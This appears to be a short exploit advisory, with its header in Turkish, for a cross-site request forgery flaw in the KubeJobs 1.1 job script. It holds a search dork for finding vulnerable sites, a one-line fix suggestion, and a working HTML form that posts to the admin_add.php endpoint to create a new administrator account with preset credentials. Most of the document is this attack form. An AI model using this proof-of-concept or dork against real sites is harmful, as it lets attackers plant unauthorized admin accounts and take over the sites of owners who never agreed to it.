<------------------- header data start ------------------- >
#############################################################
# author : CWH1RLPOOL | Bug Researchers
# Script Name : KubeJobs
# Bug Type : XSRF
# Infection : Yeni Admin Eklenebilir.
# Dork : Powered By KubeJobs version 1.1
# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
<form name=form1 method=post action=http://demos.kubelabs.com/KubeJobs/adm/admin_add.php>
<table width=70% cellpadding=0 cellspacing=2 border=0>
<td width=25%><strong>username</strong></td>
<td width=55%>:
<input name=username type=Text class=textbox id=username style=width:60% value=cwhirlpool></td>
<td width=25%><strong>password</strong></td>
<td width=55%>:
<input name=password type=password class=textbox id=password style=width:60% value=cwhirlpool></td>
<td> </td>
<td> </td>
<td></td>
<td height=30 style=padding-left:6px;><input name=Submit type=submit class=button value=Submit>
<input name=Reset type=reset class=button value=Reset>
</td>
</table>
</form>
< -- bug code end of -- >